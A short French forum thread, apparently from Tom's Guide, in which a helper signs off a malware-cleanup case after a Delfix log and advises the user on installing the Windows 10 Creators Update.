    Lire Sécuriser son ordinateur et connaître les menaces
    Divers Tutoriels et astuces de Windows 10

    Vous pouvez marquer votre sujet comme résolu
    Clique, dans mon dernier message , sur le bouton vert "Sélectionner comme meilleure solution"
    Il sera mis automatiquement marqué comme "résolu
    partage
    il y a 13 minutes

    Merci infiniment pour votre aide, je vous fournit le compte rendu delfix:
    https://up.security-x.fr/file.php?h=R6577863cae88a91d3b...
    la mise a jour ne se fait pas pour l'instant, j'ai le message: "Nous ne parvenons pas à installer certaines mises à jour, car d'autres sont en cours. Vous pouvez essayer de redémarrer votre ordinateur. Nous continuerons à tenter de procéder à la mise à jour." ce que j'essaye de suite.
    m
    0
    l
    a b 8 Sécurité
    il y a 3 minutes

    Bonjour, :) 

    C'est OK pour Delfix.

    Si rien n'est proposer avec Windows Update pour faire la mise à jour de la version de windows 10
    Tu peux essayer Installer la mise à jour Windows 10 1703 (Creators Update)
    Je te conseille avant de désinstaller ton Antivirus.

    Voilà prudence sur le net et dans tes téléchargements. ;) 

    Bonne continuation.
    m
    0
    l
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS